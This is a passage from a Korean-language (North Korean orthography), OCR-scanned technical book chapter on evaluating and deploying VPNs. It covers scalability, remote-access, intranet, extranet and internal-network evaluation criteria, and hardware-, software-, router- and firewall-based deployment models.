수직 확대 성 (vertical scalability ) 이 라고 한다. 둘째 대 안은 VPN 봉사기 관리 소 (server farm ) 전 반 
의 VPN 련결점 들의 부하조절 즉 부하분배 를 진행하는것 이 다. 부하조절을 위 해서는 특수 
한 처 리 장치 나 쏘프트웨어 가 필 요한데 전용부하조절하드웨 어 를 리용하든가 아니 면 여 러 
VPN 봉사기사이 방책복사나 상태복사를 하는 방법이 있다. 결선적인 측면에서나 경제적 
측면에서나 VPN 봉사기관리소를 부하조절하면 조절능력이 더 좋아 진다. 필요에 따라 더 
많은 봉사기들을 추가할수 있으므로 부하조절하면 또한 예비능력도 조성된다. 그 어떤 
봉사기가 고장났다면 부하를 현재 가동중인 VPN 봉사기들에 분포시킬수 있다. 일부 
HA(Helper Application ) 대 안들은 접 속과정 을 중단시 키 지 않고 이 런 작업 을 할수 있으며 
일부는 접속과정을 중단시켜야 가능하다. 암호화가속기 즉 하드웨어식암호화카드들을 
VPN 봉사기에 추가하여 봉사기에서의 런넬화처리속도를 높일수도 있다. 현재 망대면부기 
판에 소편형태 로 암호화기 술이 실행되 고 있다. 가속기는 런넬 이 접 합되는 VPN 봉사기 에 
서 더 중요하고 대 안 VPN 의 뢰기를퓨터에서 는 덜 중요하다. 

VPN 봉사기 의 능력판정 에서는 관리 의 편리 성 도 고려해 야 한다. 특히 관리 자가 조작 
과제 를 수행하며 자동화하는것 이 어 느 정도로 쉬운가 하는 문제를 제기해 보아야 한다. 
실례 로 새 로운 런넬을 추가하는것 이 얼마나 쉬 운가，추가적 인 런넬설정파일들을 VPN 의 
퇴기 에 자동적 으로《내 리먹을수》있는가 하는 물음들이다. 사용기록，보고，경보와 갈은 
기능들은 VPN 봉사기관리대면부에 반드시 있어야 할 기초기능들이 다. VPN 사용기록이 현 
존 자료기지와 망관리체계에 인차 보내여 지는가， VPN 봉사기가 실시간적인 사용기록과 
경 보를 제 공하는가，려 과장치 가 봉사기 사용기 록부에 신속히 적 용되 여 시 간적 으로 사용자 
선택성사건들을 강조하여 표시하는가，수자식인증서를 사용할 때 어느 인증기관을 내세 
워 보증하는가，수자식인증서 청구 및 구입절차는 자동화된 직결과정인가 아니면 사람이 
수동적 으로 개 입할것 을 요구하는가 등의 질 문에 대 답이 주어 져 야 한다. 물론 인증서 청 
구와 구입과 같은 반복적인 과제들은 응당 자동화되여 있기도 하다. VPN 봉사기가 인증 
서부도명 단을 요구하여 사용자인증서의 유효성을 검열해 보는가 하는 문제도 중요하다. 

표 9 一 3은 원격접 근봉사기 평 가기 준들에 대 한 례이 다. 
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표 9-3 원격 접근봉사기평가기준 


• 범위성(봉사기가 결선조건들을 만족시키는가) 

• 높은 리용성선택사항의 지원 

• 아며: .있던 사용자인증체계와 통합되는 정도 

• 하드웨어식런넬처리, 암호/복호 가속 

• 사용자인증과정의 자동관리 

• 운용호환성 에 대 한 업계 VPN 표준에 대 한 지원 

• 어떤 인증형래를 지원하는가 

• 경화된 조작체계에서 VPN 봉사기가 가동할수 있는가 

• VPN 봉사기 와 의뢰기 량쪽에 설치된 방화벽의 호상결합이 가능한가 

• 중앙조종화된 의뢰 기 관리 기흉: 

• 탁상형콤퓨터의 조작체 계 에 대 한 광범한 의뢰기지원 


인트라태 트 VPN 

인트라네 트 VPN 은 기 업의 광지역망 (WAN) 안에 있는 고정된 장소，지사나 가정사무 
실들을 서 로 련결시 켜 준다. 인트라네 트 VPN 은 싸이 트 대 싸이 트 즉 VPN 관문 대 VPN 관 
문의 위상구조를 가진다. 인트라네트 VPN 의 상업적리점은 기 관의 망기 반의 원가를 절 약 
하여 정 보흐름을 증가시키 는것 이 다. 인트라네 트의 본질 이 싸이 트 대 싸이 트이 기 때 문에 
말단사용자탁상형 콤퓨터 에 는 영 향이 얼마 없 다. 인트라네 트를 응용하기 위하여 VPN 을 
판정할 때 중요하게 고려해 야 할 항목은 성 능, 이 전망구조와의 운용호환성，관리 성 이 다. 
인트라네트 VPN 의 기술적리점은 WAN 대 역너 비의 원가가 낮고 위상구조가 보다 유연하 
며 (례하면 완전한 그물모양) 새 로운 싸이트련결 이 신속하고 쉬 운것 이 다. 

생산업체에서 제공하는 VPN 하드웨 어/쏘프트웨 어체 계들인 원격설정가능 VPN 기구들을 
사용하게 되는 경 우는 싸이트상의 관리체 계 나 실행시 간이 없을 때 이 다. VPN 응용제품들 
의 가치 는 보다 전통적 인 《 자체 건설식》방법 으로 하드웨 어, 조작체 계, VPN 봉사기 쏘프트 
웨어를 결합시키는데 시간과 노력이 얼마나 드는가를 비교해 보면 보다 뚜렷해 진다. 

전송흐름을 조절하여 어떤 규약보다 특정한 규약을 우선적으로 처리해 주는 식의 급수 
별봉사조절도 가능하다. 어떤 상업적요구가 제기되 여 특정한 형태의 VPN 전송자료가 다른 
전송자료보다 회전지연시간이 적어야 한다고 하면 이때에는 이것이 문제성을 떤다. 실례로 
비 데 오나 음성자료의 흐름식 전송은 그 사용자의 기 다림 혹은 그런 부류의 응용프로그람의 
특성으로 하여 파일전송이 나 HTTP 전송보다 더 지속적 인 비트속도를 요구할수 있다. 

인 터네 트로《 굴을 뚫고 나가》는 인트라네 트 VPN 의 일 반적 사용을 제 한하는 두가지 
요인은 담보대역너비가 없는것과 회전지연이 있는것이다. 이 두가지 요인이 국제적으로 
전개된 개별 WAN 식 인트라네트 VPN 에도 영향을 줄수 있지만 대부분의 회사들은 국제적 
인 개별 WAN 대역너비를 확보하여 인터네트상의 VPN 의 낮은 원가와 경쟁할 생각을 못하 
고 있다. 원가 대 리윤분석을 하여 보면 개별 WAN 을 쓸것인가，인터네트상의 인트라네트 
VPN 을 쓸것 인 가 아니 면 외 부자원 을 리용한 VPN 봉사를 쓸것 인 가를 결 정하는데 도움 이 
될 것 이 다.《 다중규약표식 교환》 (Multi-Protocol Label Switching 즉 MPLS) 은 자료전송순서 
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를 정 하는 표준방식 을 제 공하는 하나의 규약이 다. MPLS 는 회 전지연을 경 감시키 고 담보 
된 대역너비문제를 해결하는데 리용된다. MPLS 를 리용하면 전송자료를 분리하여 순서를 
매김으로써 일부 자료들이 보다 빨리 전송되게 할수 있다. IPSec VPN 응용프로그람에서 
MPLS 식망요소들을 사용하는 우점은 VPN 전송자료가 다른것들에 비하여 우선권을 가지 
며 따라서 처 리률이 높아 지 고 회 전지연이 낮아 지 는데 있 다. 

VPN 의 위상구조는 인트라네 트 VPN 의 경 우에 중요하게 고려할 조건으로 된다. 많은 
인트라네트 VPN 은 그 기관의 정보흐름의 비중앙집권적 인 성격 으로 하여 그물 같은 위상 
구조를 요구한다. 다른 경우들 즉 중앙적 인 정보흐름이 있거나《중심사무실》개념을 실 
시해야 할 필요성이 있는 경우에는 수레바퀴식위상구조가 필요하다. 망의 변화가 부단히 
진행 될것 으로 예 상되 는 경 우에 는 동적경 로조정 과 동적 VPN 설정 을 지 원하는 VPN 대 안이 
필 요하다. 동적경 로조정 이 필 요한 경 우는 사람의 간섭 이 거 의 없 이 VPN 상으로 망주소갱 
신을 전반적 으로 빨리 해 야 하는 경 우이 다. 경 로조정봉사는 현존 망설정 에 영 향을 줌이 
없 이 강력한 대 역 너 비관리를 할수 있는 VPN 기 반도 원가상 효률적 으로 전환할수 있게 한 
다. 동적 VPN 기 술이 필요한 경 우는 VPN 회 선리용이 우발적이 며 단시 간내 에 만 하는것 을 
예견한 경우이 다. 동적 VPN 분야에 대한 연구사업 이 현재 상당히 진척되 여 대규모 배비에 
서 VPN 런넬설치의 행정관리상부담을 덜어 줄 전망이 보이고 있다. 

인 터네 트를 리용하여 인트라네 트 VPN 을 구축하는것 은 일 반적 으로 보면 원가 대 효률 
이 가장 높은 VPN 기 술실 행 방법이 다. 그러 나 앞에 서 언급한것 처 럼 봉사준위 가 인 터네 트 
에서 대체로 담보되여 있지 않다. IP 전송에 대한 봉사준위의 담보가 없지만 인트라네트 
VPN 에서는 다 그렇지 않다. 일부 ISP 들과 개별표식 IP 제공자(례를 들어 Digtal Island 회사 
와 갈은)들이 봉사준위의 담보를 제공하지만 이 기술은 이제 방금 성숙되여 가고 있는것 
이므로 이런 봉사제공에서 가장 큰 리득을 얻기 위해서는 고객들이 하나의 ISP 의 IP 망에 
덧 붙여 자기 들의 인트라네 트를 구성하여 야 할것 이 다. 인트라네 트 VPN 을 구성할 때 담보 
봉사준위，망접 근의 광범위 성，전송비 용사이 에 서 어 떤 선택안을 취 함것 인가를 분석해 볼 
필요가 있다. 담보된 처 리률준위 를 요구하는 기 업들은 어느 한 망봉사제공자의 개 별말단 
간 IP 망우에 자기 들의 VPN 을 배비할것 을 고려해 보든가 가능하면 프레 임 중계 혹은 자기 
자체 의 개 별 골간을 구축해 야 할것 이 다. 

표 9一4에는 인트라네트 VPN 평가기준을 짤 때 리용할수 있는 항목들이 제시되여 있다. 

표 9-4 싸이트 대 싸이트인트라비트 VPN 평가기준 


전제: 없음 

• 자동방책분배 및 설정지원 

• 그물형위상구조의 자동설정，수레바퀴형위상구조에 대한 지원 

• 망 및 봉사 감시능력 

• 이질적인 망에 사용되는 경우 VPN 표준의 준수 

• 봉사급수조절 

• 동적경로조정 및 턴넬설치능력 

• 범위성과 높은 리용성 


139 




엑스트라비트 VPN 

엑 스트라네 트 VPN 은 기 업 동업 자들과 고객 들사이 에 서 정 보흐름을 선택 적 으로 조종할 
수 있으며 여 기 에서 중시 되 는것은 높은 세밀접근조종과 강력인증이다. 례를 들어 보면 
관리 자는 발신자와 수신자의 주소，인증된 사용자 ID, 사용자그롭，인증형식，응용형 태(례: 
FTP, Telnet), 암호화형 태，날자시 간창，지 어는 령 역 등을 비 롯한 다중파라메 터를 리 용하 
여 개 별적응용프로그람에 사용자마다 다른 접 근특권을 부여할수 있 다. 

엑스트라네트 VPN 은 하나의 회사가 공급사슬과 기업동업자들사이에 정보를 공유하 
는 사용자 대 중앙싸이 트모형 을 리 용할수도 있으며 자동망교환대 (Automotive Network 
Exchange) 와 같은 싸이 트 대 싸이트모형 도 리용할수 있 다. 사용자 대 싸이 트모형 을 지 향 
하면 사용자의 탁상형 콤퓨터 가 중앙싸이 트의 통제 밑 에 있지 않는것 만 제 외 하고는 원격접 
근 VPN 과 그 평가기준이 류사하다. 엑스트라네트사용자콤퓨터가 자기 회사의 보안방책밑 
에 놓이 게 되 기 때 문에 사용자콤퓨터내 에서 실행 되 는 보안방책 에서 충돌이 일 어 날수 있 
다. 일 반적 으로 사용자 대 싸이트모형 에 서 엑 스트라네 트동업 자들은 공동으로 노력하여 
보안방책 실현과 관련한 합의를 봄으로써 사용자콤퓨터， VPN 의뢰기설치문제，질문봉사안 
내소，지속적 인 유지보수 그리 고 어 느 동업 자가 실수하여 다른 동업 자의 망이 침해를 당 
하게 되는 경우 법적책 임 문제 등에서 안전방책실현이 촉진될수 있을것 이 다. 판매 업체의 
VPN 의뢰기 가 지 원하는 하드웨 어가동환경도 하나의 문제 로서 조사하여 원격엑스트라네트 
동업자들이 어떤 가능한 가동환경을 쓰고 있는지 알아 보아야 한다. 대부분의 경우 엑스 
트라네트환경에서 선택해야 할 가장 좋은 쏘프트웨어의뢰기로서 Web 접속이 사용되군 하 
며 SSL 은 흔히 보안규약으로 리용된다. 이것으로 하여 설정과 유지보수문제가 예상외로 
상당히 간단해 진다. 엑스트라네트 VPN 에서는 모든 참가자들이 어느 ISP 를 선택하든 괜 
찮은 봉사질이 제공되며 동일한 ISP 를 리용해도 문제가 전혀 제기되지 않는다고 생각한 
다. 필요한것 이 란 그 그룹의 매 성원이 일정한 형 태의 인터네 트접근만 하면 되는것 이 다. 
매 싸이트에 있는 VPN 쏘프트웨어 나 설비는 반드시 엑스트라네트의 기 본싸이트에 있는 
VPN 설비의 IP 주소로 설정되여야 한다. 

엑 스트라네 트 VPN 의 매 력 이 주로 시 장확대 능력 과 기 업 련 계 능력 을 강화하는데 있 으 
므로 시 장실 현의 견지 에 서 볼 때 엑 스트라네 트의 뢰 기 쏘프트웨어 에 대 한 상표광고 및 관 
매촉진사업을 할 필요가 있다고 본다. 이 렇게 하자면 일부 엑스트라네 트 VPN 쏘프트웨 어 
및 봉사제공자들인 경우 엑스트라네트의 입구점으로 되는 Web 폐지 (Web 열람기를 쏘프트 
웨 어 가동환경 으로 쓰는 경 우)상에 서 나 VPN 의 뢰기 (전통적 인 의 뢰 기/봉사기 쏘프트웨 어 모 
형 인 경 우)내 에 서 이 사업 을 진행 해 야 한다. 소비 자시 장에서 엑 스트라네 트 VPN 은 Web 열 
람기 식 SSL 의 대 안으로 리용할수 있 다. IPSec VPN 이 Web 열 람기 식 SSL 보다 더 좋은 경 우 
는 고객 이 알려 져 있으며 그 싸이트에 많이 되돌아 올수 있는 경 우이 다. 다른 말로 말 
하면 엑 스트라네 트 VPN 이 사람들이 신용카드를 가지 고 구매하러 한번씩 올수 있는 소비 
자상품환경에서는 잘 맞지 않는다는것이다. 

Web 열 람기 식 SSL 은 자연발생 적 인 단순거 래 관계에서 는 좋지 만 고가자료접 근을 필요 
로 하는 끊임 없는 기 업관계 에서 는 수자식 인증서 식 의 호상인증을 쓰는 IPSec VPN 의뢰기/ 
봉사기를 쓰는것 이 더 적 합할수 있다. 의뢰기측의 인증서 가 사용되는 경우에 는 열 람기식 
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SSL 이 적 용될 수 있 다. 말하자는 기 본내 용은 수자식 인증서 에 의하여 사용자가 확인된 다면 
VPN 이 접근조종기능을 리용하여 그 사용자에게 회 사망에 있는 각이한 자원에 대 한 접근 
권을 줄수 있다는것이다. 사용자들에 대한 이러한 수준의 조종이 있음으로 하여 많은 회 
사들에서는 이 수자식인증서를 사용하여 왔다. 분명 이것은 대규모의 엑스트라네트 VPN 
을 실현하는 경우에는 우려되지 않을수 없다. 엑스트라트 VPN 내부에서의 PKI 와 관련되 
는 문제들은 이 장에서 론할것이 못된다. 

현존 인트라네 트 VPN 이 엑 스트라네 트 VPN 실현의 기 초로 리용될수 있겠는지 . 그것 은 
위험허용수준과 보충적인 원가가 얼마나 높은가에 달려 있다. 인트라네트가 엑스트라네 
트의 회선들을 지 원하게 하는것은 권한에 제 한된 새 로운 망사용자들을 정의해 주는것만 
큼이나 상당히 쉬운 기초적인 일이다. 그러나 자료보안에 직접 영향을 줄수 있는 엑스트 
라네 트 VPN 을 설 계하는데는 일 련의 미 묘한 차이 가 있 다. 엑 스트라네 트를 가능한것 으로 
만들수 있는 방법 의 하나는 가령 비 무장지 대 를(례 컨대 울타리방화벽 의 3번째 대 면부에) 
설치하여 외부 사용자들을 지원하게 하는것이다. 이러한 방법은 인트라네트와 엑스트라 
네트의 자원뿐아니 라 VPN 봉사기를 통한 자료의 무결성과 비밀성도 방화벽 이 보호해 주 
게 한다. 

표 9 一 5는 엑 스트라네 트 VPN 응용평 가기 준표의 례 를 보여 주고 있 다. 이 표에 는 엑 스 
트라네트 VPN 평가기준들을 만들 때 리용할수 있는 항목표가 제시되였다. 

표 9-5 엑스트라비트 VPN 평가기준표 


• 단순통과암호/사용자이름보다 강력한 호상인증을 더 우선시한다. 

• 접근조종과 사용기록이 매우 중요하다. 

• 사용자주문식상표선전을 할수 있는 대안들이 더 좋다. 

• 탁상형콤퓨터를 놓는 자리의 최소화(그것은 탁상형를퓨터가 대방의것이 아니기때문에) 

• 미 리 설정된 VPN 의뢰기 와 VPN 방책의 《조용한》실행 

• VPN 의 뢰기의 사용상 편의 가 관건적 이다. 

• 봉사준위 에 대 한 감시 및 사법적지원 


내부망의 보안 


비밀 자료들이 내부 사람들에 의하여 계속 위협 당하고 있는 회 사들이 최근에 깨 달은 
것 은 VPN 과 방화벽 을 리용하여 내 부망을 구분하거 나 세 분화하는것 이 제 품매 상고에만 급 
급하는 보안제 품판매업체들의 단순한 판매광고가 아니 라는것 이 다. 외부의 위협 이 증가하 
고 있는것은 사실 이지 만 자료보안을 위협하는 내부의 공격도 여 간하지 않다. 그러므로 
새 롭게 부상하는 VPN 대 안은 내 부망을 안전하게 하기 위한것 으로 된 다. 

망보안의 견지에서 보면 망을 세분화하는데는 여러가지 방법 이 있다. 한가지 방법은 
내 부망을 론리적 으로 가르는것 이 고 다른 방법 은 망을 물리 적 으로 구획하는것 이 다. VPN 
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기 술은 두가지 방법 을 다 리용할수 있게 한다. 실례 로 목표봉사기 를 VPN 봉사기 의 바로 
뒤에 놓아 물리적구획을 지을수 있다. 여기서 목표봉사기에 접근할수 있는 유일한 방도 
는 VPN 봉사기 의 접 근조종방책 을 만족시키 는것 이 다. 여 기서 유리한 점 은 관리 가 쉽 고 경 
계 를 명 확히 정 의할수 있 으며 접 근점 이 하나이 라는것 이 다. 

론리적구획화의 실례는 사용자가 목표봉사기에 접근할 필요가 있는 경우 그에게 
VPN 의 뢰기 쏘프트웨어 를 제 공하는 경 우를 들수 있 다. 사용자는 현지 에 있든 먼곳에 있든 
내 부망의 어 느 곳이 든 물리 적 으로 위 치할수 있 다. VPN 의 뢰기 쏘프트웨어 는 직 접 혹은 내 
부 VPN 관문을 통하여 목표봉사기와 암호화된 통화를 자동적으로 실현한다. 내부망은 결 
국 접근조종을 통하여 론리적으로《구획화》되게 된다. 다른 하나의 론리적구획화씨나 
리오는 내 부망에 서 동등관계 VPN 통화가 실현될 필 요가 있는 경 우를 들수 있 다. 이 경 우 
에 필요에 따라 림시 적으로 2개 혹은 그이상의 VPN 의뢰기 들이 VPN 접속을 실현할수 있 
을것이다. 이러한 설정의 좋은 점은 동적 VPN 이 사용자의 설정조작이 얼마 없이 설치되면 
서 도 자료의 사적 비 밀성 이 보장된 다는것 이 다. 이 방법 의 약점 은 VPN 의 뢰기 들이 동등위 
치 VPN 에서 강력한 사용자인증을 지 원하지 못하는 경 우 사용자인증강도가 떨 어 질수 있 
다는것 이 다. 

망계 층구조안에서 어 디에 VPN 기능을 실현시키 겠는가에 대한 위치중시 에서 일련의 
변화가 있는것 같다. Microsoft Windows 2000의 도입으로 하여 전용하드웨어와 쏘프트웨 
어를 사용하여 후에 추가하는 식 이 아니 라 VPN 기술이 직접 조작체계 에 포함되게 되 였다. 
이 Wondows 2000의 출현으로 하여 내부망의 안전을 보장할수 있는 VPN 통합수준은 더 
욱 깊 어 지 게 되 였 다. VPN 기 술은 봉사기 준위 에 서뿐 아니 라 Microsoft Windows 와 UNIX 의 
여러 판본들에서도 실현되고 있다. 물론 이 수준의 VPN 통합이 내부망보안의 전부를 의 
미하지 는 않지 만 처 음부터 보안적안목의 구축을 적 극 장려하는것 으로 될수 있 다. VPN 을 
목표응용봉사기 에 적 접 구현하는것 이 현재 성 능에 상당한 영 향을 미치 는것 처 럼 암호화기 
능을 위 해서 는 하드웨 어가속기 가 필요하다. 

내 부망에 서 자료의 비 밀성 을 보장하는 문제 는 원격접 근 VPN 실 행 에 쓰이 는 전개 및 
관리 방법 을 곡같이 리 용하여 해 결할수 있 다. 사용자집 단도 꼭 같다. 하드웨 어가동환경 도 
곡 갈다. 그것은 너무나도 많은 회사들이 자기 사원들에게 무릎형콤퓨터와 갈은 휴대형를 
퓨터 를 공급하기 때 문이 다. 고려해 야 할 하나의 차이 는 물리 적 으로 내 부망안에 있는 YPN 
의뢰기 에 실시해 야 할 보안방책과 동일한 하드웨 어 를 리용하여 원격접근 VPN 을 통하여 
원격적으로 내부망에 접근해야 할 때에 필요한 보안방책사이의 차이이다. 회사의 자료가 
인터네 트와 같은 공공망을 거 처 흐르므로 비 법접근의 위 험성 이 더 많기때 문에 사용자를 
이 원격접속할 때에는 더 엄격한 보안방책을 실시하는것이 현명할수도 있다. 내부접근이 
나 외부접 근이 나 위 험은 마찬가지 이지 만 원격접근 VPN 을 사용할 때 에는 공격 받을 가능 
성 이 훨씬 더 크다. 내부망에 VPN 기술을 적용하는 다른 하나의 목적은 LAN 통신에서 자 
료의 비밀성을 보장하는것이다. 

그러 나 Microsoft File Sharing/SMB 환경 에서 제곱으로 증가될수 있는 VPN 접속의 관리 
가 운영상 복잡하기때문에 일부 회사들은 단일《그룹》이나 LAN 열쇠가 충분한가 하는 
데 대 하여 조사하고 있는데 어떤 전개 방식에서는 인증보다 전송할 때 자료의 비밀성 이 
더 중요한것이다. 


142 



내부망 VPN 안전실현을 위한 평 가기준의 례를 표 9一6에 주었다. 


표 9-6 내부망 VPN 응용의 안전을 위한 평가기준내용 


• 강력한 사용자인증 

• 강력한 접근조종 

• 방책에 기초한 암호화에 의한 비밀보장 

• 망통과시 자료의 무결성 

• 내 부망기 반에 적 은 부담을 주는것 

• 사용자콤퓨터(탁상형콤퓨터)에 적은 부담을 주는것 

• 편리한 관리방법 

• 기성 망설비들과의 결합 

• 운영비(기업목적에 대비하여 볼 때는 큰 문제가 아닐수도 있음) 

• VPN 의 뢰기 문제 : 

• 사용자투명성(사용자가 그 어떤 다른 작업을 해 야 할 필요가 있는가) 

• 원격접근과 내부 VPN 방책사이의 차이를 자동판별하는것 (VPN 의뢰기가 내부/외부 
보안방책변경 에 자동적 으로 순응될수 있는가) 


VPN 배비모형 


이 부분에 서 는 네 가지 VPN 봉사기 전개 모형 을 설명 하려 고 한다. 네 가지 모형 으로는 
전용하드웨 어 및 전용제 품모형，쏘프트웨 어 식 모형，경 로기 식모형，방화벽식 모형 이 있 다. 
VPN 사용형태는 보안요구수준，성능요구사항，망기초시설통합노력，실현 및 운영비 등에 
따라 다르다. VPN 의 뢰기 전개 에 대 해서 는 앞에서 언급되 였으므로 이제부터 는 VPN 봉사기 
전개문제 에 대 하여 집 중적 으로 보기 로 하자. 

전용하드웨어식 VPN 제품 

현재 나오는 가장 좋은 VPN 봉사기 가동환경 은 전용하드웨 어 제 품 즉 특정한 용도로 
만든 VPN 제품의 가동환경이다. 단일용도에 최량화정도가 높은 설계로 하여(일부 측면에 
서) 전개，관리，리해가 보다 쉬우며 많은 경우 원가가 적게 들기때문에 전용하드웨 어계 
품을 사용하는것은 매우 대중화되였다. 이러한 형태의 가동환경의 기본착상은 일반가정 
용품의 실례 와 류사하다. 실례 로 빵구이기계 를 사서 집 에 가져 온 다음 그것 을 좀 개조 
해 보려 고 하는 사람들은 얼마 없 다. 말하자는것 은 여 기서 완성 품인도방식 을 중시해 야 
한다는것 이 다. 

이 제 품들은 구매 자가 수정하지 않을것 을 예 견하여 표준하드웨 어 설정값으로 맞추어 
판매하는것이 상례이다. 특정용도 VPN 제품들은 대체로 암호화실행속도의 필요로 하여 
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고성 능문제 가 제 기될 때 다른 가동환경 에 비해 우월성 이 있다. 대부분의 특정 용도 VPN 
제 품들善 전용실시 간조작체계상에 집적되 여 있으므로 전용하드웨 어 에서 최 량적 인 가동을 
할수 있게 되여 있다. 값이 눅은 많은 VPN 제품들은 인텔가동환경에서 동작하는 개조된 
리눅스와 BSD 조작체계 에서 사용한다. 대체 로 이 제 품들은 공장설정값으로 설정되 여 먼 
거리에 있는곳에 운반되여 쉽게 설치되고 원격관리된다. 여기서 장점은 대규모적인 전개 
를 신속히 실현 한다는것 이 다. 원격 사무실 이 많고 주요원거 리 통신사업 자 (telecom carriers) 
들을 가지 고 있으며 ISP 와 보안관리봉사제 공자들을 가지 고 있는 대 규모 회 사들에 서 는 바 
로 이러한 전개모형을 사용한다. 기관에 현장 rr 일군들이 부족되는 경우에는 VPN 제품들 
을 쓰면 분포도가 높은 VPN 실현에서 흔히 요구되는 인적자원을 상당히 줄일수 있게 된다. 

하드웨 어식 VPN 기 구들을 리용하여 분산성 이 높은 대 규모 VPN 을 전개하는 한가지 방 
법 은 다음과 같다. ® 기 구가 쓸 기 본망파라메터 들을 미 리 설 정한다. ® VPN 용품들의 수 
자식 인증서 를 미 리 설 치한다. ③ 용품을 원격 지 로 날라 간다. ④ 그다음 먼곳에 있는 사 
탐에 게 그 용품의 나머지 물리적설 치를 수행하게 한다. 그 용품을 전원에 꽃은후 망케 블 
을 련결한 다음에는 원격관리로 필요한 설정과제를 끝낼수 있게 준비되여 있어야 한다. 
VPN 제품사용의 단점은 VPN 제품하나에 모든것을 다 내장시켰기때문에 하드웨어수정을 
할수 없 게 된것 이 다. 또한 전매 특허조작체 계 를 쓰는 VPN 제 품들을 리 용하면 다른 또하나 
의 조작체계를 배워야 하며 현존 체계관리도구들과는 운용호환성이 없는 측면도 있다. 
그것 은 할수 없 다. 자체 로 VPN 제 품의 하드웨 어 를 수정하려 한다면 VPN 제 품방향으로 나 
가지 않는것이 좋을것이다. 

많은 통신사업자급의 VPN 교환기 들 즉 수만개 의 서 로 다른 회 선들을 관리하는 능력 
을 가진 VPN 관문들은 대 규모원거 리 통신망들인 전기 통신회 사들, 인 터네 트봉사제 공자들이 
나 대기 업상업망들의 요구사항에 부합되는 다른 급의 VPN 부분품들이 다. 통신사업자급의 
VPN 관문들의 특징은 설치 가 빠르고 쉬우며 경험 이 없는 사람도 쉽게 설치할수 있다는것 
이 다. 업무량증대의 요구에 부합될수 있는 높은 처 리률과 의뢰기쏘프트웨어 가 전개 하기 
쉬운 점도 통신사업자급의 VPN 관문의 뚜렷한 징표로 된다. 

쏘프트웨어에 기초한 VPN 

쏘프트웨 어 에 기 초한 VPN 봉사기 들은 VPN 쏘프트웨 어 를 일 반조작체 계 를 쓰는 일 반를 
퓨터에 실치한것들이다. 지원되는 대표적인 조작체계들은 당시 시장에서 구매력이 제일 
높은것 이면 어느것 이 나 다 좋다. 이로부터 Microsoft Windows 나 UNIX 조작체계들은 둘다 
잘 쓰인다. 일부 쏘프트웨어 에 기초한 VPN 들은 설치할 때 OS 들을 조작하여 보안경화， 
일정한 수준의 성 능최 량화나 망대 면기 판의 세 밀조절 등을 하는 경 우가 있 다. 제 품이 대 
체 로 완성일체식 으로 판매 되 기 때 문에 VPN 하드웨 어 의 주요 부문품들의 성 능을 일정하게 
높이 든가《세밀조절》해 보려고 할 때 바로 이 쏘프트웨 어 식 VPN 을 리용하군 한다. 또 
한 현존 일 반콤퓨터하드웨 어 를 리용함으로써 비 용을 최 소화하려 고 하는 경 우에 이 쏘프 
트웨어 VPN 을 쓸수 있다. 

쏘프트웨어 에 기 초한 VPN 봉사기 의 부족점 은 전용 VPN 제 품에 비한 성 능저 하，없으면 
봉사기하드웨 어 와 조작체 계 를 구매해 야 하는것，하드웨 어암호화카드 구입 에 드는 보충적 
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인 비용，조작체계를 경화시키기 위 한 보충적 인 노력 등이 다. 부하조절과 같은 적 당한 범 
위성 조절수법들을 리용하든가 하드웨 어 암호화추가카드를 사용하면 이 러한 부족점들을 다 
어느 정도 약화시 킬수 있다. 또한 VPN 쏘프트웨어는 일반적으로 선불구매 가격 이 덜 비싸 
다. 때 로는 쏘프트웨어 가 조작체 계 안에 포함되 여 있기도 한다. 실례 로 Microsoft Windows 
2000 Server 에 는 IPSec VPN 봉사기 가 포함되 여 있 다. 

일 부 판매 업 체 들의 쏘프트웨 어 에 기 초한 VPN 제 품들은 여 러 가지 가동환경 에 쓸수 있 
으므로 중앙조종탁에서 관리할수 없으며 매 가동환경 이 그 모양새 와 느낌 이 다르다. 이 
러 한 실행 과 관리 에서 일관성 을 보장하기 위 해서 는 하드웨 어가동환경 과 조작체 계 의 표준 
화를 진행하는것 이 좋을것 갈다. 가동환경의 표준화를 진행하면 새 기 술습득이 최 소화될 
수 있 으며 가동환경별 로 나타나는 특성 들이 제 거 될수 있 다. 

경로기에 기초한 VPN 

VPN 을 배비할수 있는 값 눅은 하나의 입 구점 은 VPN 기 능들을 다 가지 고 있는 현존 
경로기를 리용하는것이다. 현존 망자원들을 다 효과적으로 리용하면 실현비용을 낮출수 
있 으며 망관리기 반시 설 과의 통합을 보다 쉽 게 실 현 할수 있 다. 오늘날 많은 경 로기 들이 
VPN 규약을 지원하고 있으며 보다 새로운 경로기들은 VPN 전송자료들을 보다 효률적으로 
처 리할수 있게끔 성 능이 향상되 였 다. 그러 나 경 로기 의 일 차적 인 기 능이 망사이에서 망파 
케 트들의 방향을 잡아 주는것 이 기 때 문에 경 로조정 성 능과 VPN 기 능사이에 어 느것 을 택 하 
겠는가 하는것 은 토론하여 결정해 야 할것 이 다. 일부 경 로기 모형 들은 하드웨 어 갱 신을 지 
원하여 보충적 인 VPN 처 리 능력 을 조성할수 있 다. 현존경 로기 들을 갱 신할수 있는 능력 이 
있음으로 하여 VPN 사용자들이 급격 히 늘어 나면 점 차 그쪽으로 이 행할수도 있을것 이 다. 
많은 경로기형 VPN 들은 수자식인증서지원기능도 가지고 있다. 일부 경우에는 본문파일들 
을 자르고 붙이고 하여 수동적으로 수자식인증서 청구 및 구입을 해야 하기도 한다. 
VPN 마디 수에 따라 범 위 조절 이 좌우될수 있 다. VPN 이 가능한 경 로기 들은 강력한 보안관 
리도구 즉 하드웨 어제품식 이 나 쏘프트웨 어식 VPN 에 흔히 제공되는것과 곡 같은 보안관리 
도구들이 있어 야 한다. 

경로기에 기초한 VPN 런넬은 어디에서 끝나야 하는가. 두 곳중에서 어느 곳에서나 끝 
날수 있다. 접근경로기에 VPN 을 추가할 때에는 망변두리밖에서 중단될수도 있고 혹은 내 
부경로기에 VPN 을 추가할 때에는 방화벽뒤에서 런넬화된 전송량을 중단시킬수도 있다. 

방화벽에 기초한 VPN 

방화벽은 망으로 들어 오는 전송흐름에 대하여 허용/거부결정들을 하기 위한것이다. 
자기망변두리에 방화벽을 이미 설치한 회사들은 많다. 많은 방화벽들은 기능갱신능력이 
있어서 VPN 끝점으로 사용될수 있게 되여 있다. 그렇다면 많은 회사들에서는 자기들의 
현존 방화벽이 VPN 능력이 있는가를 조사해 보는것이 좋을것 같다. 이것도 현존망기반 
을 리용하여 초기원 가를 낮추는 한가지 방법 이 다. 방화벽 을 VPN 끝점 으로 리용하는데 서 
한가지 우려되는것은 성능이다. 망을 드나드는 모든 전송자료들이 모두 방화벽을 통과 
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하므로 방화벽의 부하가 과잉으로 될수 있다. 그러나 일부 방화벽판매업체들은 하드웨 
